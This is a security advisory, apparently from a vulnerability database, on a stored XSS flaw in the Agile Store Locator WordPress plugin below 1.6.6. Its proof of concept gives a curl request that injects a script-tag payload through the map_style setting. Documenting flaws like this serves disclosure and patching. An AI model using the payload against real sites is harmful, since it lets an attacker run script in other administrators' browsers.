Agile Store Locator < 1.6.6 – Admin+ Stored XSS via map_style | CVE 2026-9060

Description

The plugin does not sanitize and escape one of its settings before storing it and outputting it on the plugin admin page, allowing high-privileged users such as administrators to perform Stored Cross-Site Scripting attacks even when the `unfiltered_html` capability is disallowed (e.g. in a multisite network where the super admin visits the page).

Proof of Concept

## Prerequisites

1. Activate the Agile Store Locator plugin (v1.6.5 or earlier).
2. Log in as an Administrator (in a multisite, log in as a subsite Admin without `unfiltered_html`).

## Steps

1. Visit `/wp-admin/admin.php?page=asl-settings` and extract the `nounce` value embedded in the page (assigned to `ASL_REMOTE.nounce` and inside the `"nounce":"..."` JSON literal).

2. Inject the XSS payload via the `save_setting` AJAX handler:

```bash
curl -k -c jar -b jar -X POST 'https://target/wp-admin/admin-ajax.php' \
  --data-urlencode 'action=asl_ajax_handler' \
  --data-urlencode 'sl-action=save_setting' \
  --data-urlencode 'asl-nounce=<NONCE>' \
  --data-urlencode 'map_style=</textarea><script>alert(/XSS-map_style/)</script>' \
  --data-urlencode 'slug_attr_ddl=' \
  --data-urlencode 'data[remove_maps_script]=0'
```

3. When any administrator (or super admin in multisite) visits `/wp-admin/admin.php?page=asl-settings`, the payload breaks out of the `<textarea>` and the `<script>` block executes in their browser session.